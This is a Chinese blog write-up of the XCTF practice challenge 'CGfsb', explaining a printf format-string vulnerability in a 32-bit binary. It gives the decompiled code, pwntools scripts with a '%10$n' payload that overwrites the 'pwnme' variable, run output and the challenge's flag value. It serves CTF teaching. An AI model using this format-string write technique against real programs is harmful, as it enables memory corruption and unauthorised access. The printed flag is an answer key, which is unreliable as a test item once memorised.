CGfsb [XCTF-PWN]CTF writeup系列2

最新推荐文章于 2021-10-01 16:56:37 发布
最新推荐文章于 2021-10-01 16:56:37 发布
阅读量560 收藏
点赞数 1
分类专栏: XCTF-PWN CTF 文章标签: xctf ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/103618324
版权
CTF 同时被 2 个专栏收录
46 篇文章 4 订阅
订阅专栏
XCTF-PWN
28 篇文章 10 订阅
订阅专栏

题目地址:CGfsb

先下载题目看看情况

 中间步骤我就不再赘述了,直接就上来分析反编译的情况,先例行检查一下保护情况

checksec 5982010c172744c8a1c93c24b5200b21 
[*] '/ctf/work/python/5982010c172744c8a1c93c24b5200b21'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

反编译成c语言代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int buf; // [esp+1Eh] [ebp-7Eh]
  int v5; // [esp+22h] [ebp-7Ah]
  __int16 v6; // [esp+26h] [ebp-76h]
  char s; // [esp+28h] [ebp-74h]
  unsigned int v8; // [esp+8Ch] [ebp-10h]

  v8 = __readgsdword(0x14u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  buf = 0;
  v5 = 0;
  v6 = 0;
  memset(&s, 0, 0x64u);
  puts("please tell me your name:");
  read(0, &buf, 0xAu);
  puts("leave your message please:");
  fgets(&s, 100, stdin);
  printf("hello %s", &buf);
  puts("your message is:");
  printf(&s);
  if ( pwnme == 8 )
  {
    puts("you pwned me, here is your flag:\n");
    system("cat flag");
  }
  else
  {
    puts("Thank you!");
  }
  return 0;
}

这里面可以注意到printf(&s);只有一个参数,正常来说printf是至少需要二个以上到参数的。

那么考点就是在这里了,注意到题目到文字部分

“菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用”

printf格式化漏洞的具体情况,大家可以去搜索一下,资料非常多,我这里就直接利用这个漏洞,把过程给大家讲一下

我先把最重要的payload部分分解一下,首先我们需要确认一下偏移位置,确定偏移位置的payload如下:

payload = 'A'*4 + '%x,'*10 + '%x'

我们在payload的前四个字节设置位AAAA,那么我们就需要在printf打印出来的字节中找到41414141这样的字符,因为ASCII码的A=41。

我先给出查找偏移位置的python脚本

#!python
#!/usr/bin/env python
# coding=utf-8

from pwn import *

p = process('./5982010c172744c8a1c93c24b5200b21')
# p = remote("111.198.29.45", 59952)

payload = 'A'*4 + '%x,'*10 + '%x'

p.sendlineafter('name:', 'aaa')
p.sendlineafter('please:', payload)
p.interactive()

执行之后的结果如下:

这里通过计算我们发现41414141是处在第10个位置 

我们回顾一下之前的题目的反编译c语言代码,需要获得flag的内容,我们要搞定的条件是:

  if ( pwnme == 8 )
  {
    puts("you pwned me, here is your flag:\n");
    system("cat flag");
  }

 pwnme跟进去看到它是bss段中的一个数据地址

.bss:0804A068 pwnme           dd ?                    ; DATA XREF: main+105↑r

现在三个条件都有了,我们重新来构造一下payload

payload = p32(0x0804A068) + 'A'*4 + '%10$n'

这里解释一下%n是写入计数值,%10$n的意思是讲计数值写入第10个参数,也就是我们之前定位的偏移值

p32(0x0804A068) + 'A'*4 计算是8个字符,也就是把8写入到0x0804A068所在地址,也就相当于给变量pwnme赋值为8

那我就继续构造一下本地执行的python脚本

#!python
#!/usr/bin/env python
# coding=utf-8

from pwn import *

p = process('./5982010c172744c8a1c93c24b5200b21')
# p = remote("111.198.29.45", 59952)

# payload = 'A'*4 + '%x,'*10 + '%x'
payload = p32(0x0804A068) + 'A'*4 + '%10$n'


p.sendlineafter('name:', 'aaa')
p.sendlineafter('please:', payload)
p.interactive()

执行结果如下:

root@mypwn:/ctf/work/python# python CGfsb.py 
[+] Starting local process './5982010c172744c8a1c93c24b5200b21': pid 69
[*] Switching to interactive mode

hello aaa
your message is:
h\xa0\x0AAAA
you pwned me, here is your flag:

cat: flag: No such file or directory
[*] Process './5982010c172744c8a1c93c24b5200b21' stopped with exit code 0 (pid 69)
[*] Got EOF while reading in interactive

注意看到了“you pwned me, here is your flag:”,因为本地没有flag文件,所以没有实际的flag值输出。

实际的执行已经是成功的,那么我们修改一下为远程执行,python代码就不再贴出来了,自行脑补,执行结果如下:

root@mypwn:/ctf/work/python# python CGfsb.py 
[+] Opening connection to 111.198.29.45 on port 59952: Done
[*] Switching to interactive mode

hello aaa
your message is:
h\xa0\x0AAAA
you pwned me, here is your flag:

cyberpeace{3f45d72f69056de04a6cf274a132a374}
[*] Got EOF while reading in interactive
$

这就执行完成了,本题主要是要理解printf的单参数漏洞及%n计数写入指定参数位置,这两个知识点。

3riC5r
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 598
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
带exp的pwn测试文件
09-12
带exp的pwn测试文件、ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash
二进制的保护机制
weixin_30872671的博客
05-29 253
这里主要讲的是CTF中linux下的ELF二进制文件的保护机制。在linux中有一个脚本checksec命令可以查看当前二进制文件的保护机制。任意安装一款gdb插件都会把checksec脚本包含进来。 在gdb中执行: gdb> checksec test Canary : No NX ...
2019中原工pwn题
Jc
05-07 401
checksec机制和file信息 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ./pwn: ELF 64-bit LSB shared object, x86-64, ...
Pwntools遇到Got EOF while reading in interactive【未完全解决】
热门推荐
qq_43596950的博客
02-18 1万+
我没有解决这个bug,但我想提供一种思路 pwn初学者,写缓冲区溢出时拿shell遇到了Got EOF while reading in interactive。 1、更换system函数 程序源代码: #include<stdio.h> #include<unistd.h> #include<stdlib.h> #include<string.h> void exploit(){ //system("/bin/sh"); //使用syst
RACTF Writeup pwn
SkYe's Blog
06-10 375
大不列颠的 Rating 0 赛,还是持续 4 天的 Not Really AI 分析 保护情况 全关 漏洞函数 简单格式化字符串 int response() { char s; // [esp+0h] [ebp-208h] puts("How are you finding RACTF?"); fgets(&s, 0x200, stdin); puts("I am glad you"); printf(&s); return puts("\nWe hope .
【XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
【XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
【XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
【XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
蒸米一步一步学ROP复现失败出现Got EOF while reading in interactive
温和的跳跃
02-05 1916
可以看看自己pwn和python还有构造的payloads是不是版本不一致 我自己的是因为安装的是python3版本的pwn然后复现错误。建议python2 python2版本的pwntools 原文payloads都是python2 一切的时间刚刚好
Got EOF while reading in interactive
weixin_52296042的博客
10-01 1685
你做错了
int_overflow [XCTF-PWN]CTF writeup系列9
重新启程
12-20 943
题目地址:int_overflow 先看看题目内容: 这道题目的名字已经把漏洞说明白了,就是整数溢出漏洞 那我们就照例下载文件,检查保护机制 root@mypwn:/ctf/work/python# checksec abd631bc00e445608f5f2af2cb0c151a [*] '/ctf/work/python/abd631bc00e445608f5f2af2cb0c...
Xman pwn guess_num writeup
qq_39596232的博客
08-24 900
题目描述: 菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 分析思路: 1、首先查看一下文件详细信息: tucker@ubuntu:~/pwn$ file guess_num guess_num: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter ...
guess_num [XCTF-PWN]CTF writeup系列8
重新启程
12-20 1572
题目地址:guess_num 先看看题目情况 照例下载附件,做保护机制检查 root@mypwn:/ctf/work/python# checksec d22084e1938f4b21a380e38e2fb48629 [*] '/ctf/work/python/d22084e1938f4b21a380e38e2fb48629' Arch: amd64-64-littl...
BUU-rip
qq_45771413的博客
04-27 677
查看保护 IDA分析 看到gets函数,这里没有输入长度限制,输入的s为16位 接下来找有没有敏感权限: shift+f12 找到了 /bin/sh,打开发现其地址在401186 Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址) 尝试写exp 运行后报错:Got EOF while reading in interactive from pwn import * p = remote('node3
2021-07-05-Buu刷题-pwn-rip--一些碰到的问题分析(做个题快做吐了,I’M so vegetable)
yundi的博客
07-06 1451
参考: https://www.cnblogs.com/yisicanmeng/articles/13906728.html https://www.cnblogs.com/vict0r/p/13773132.html https://blog.csdn.net/qq_41079177/article/details/99971701 https://blog.csdn.net/qq_53086690/article/details/116502865 出现的错误 1.直接复制脚本没改成node4.buuo
CTF竞赛中的MISC杂项实战与技能解析
"XMan-MISC-诸葛建伟XCTF-public.pdf" 这篇文档是由诸葛建伟,清华大学网络研究院的学者,XCTF联赛的发起人和蓝莲花战队的联合创始人领队编写的,主要关注CTF竞赛中的MISC(Miscellaneous)类别。MISC在CTF竞赛中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值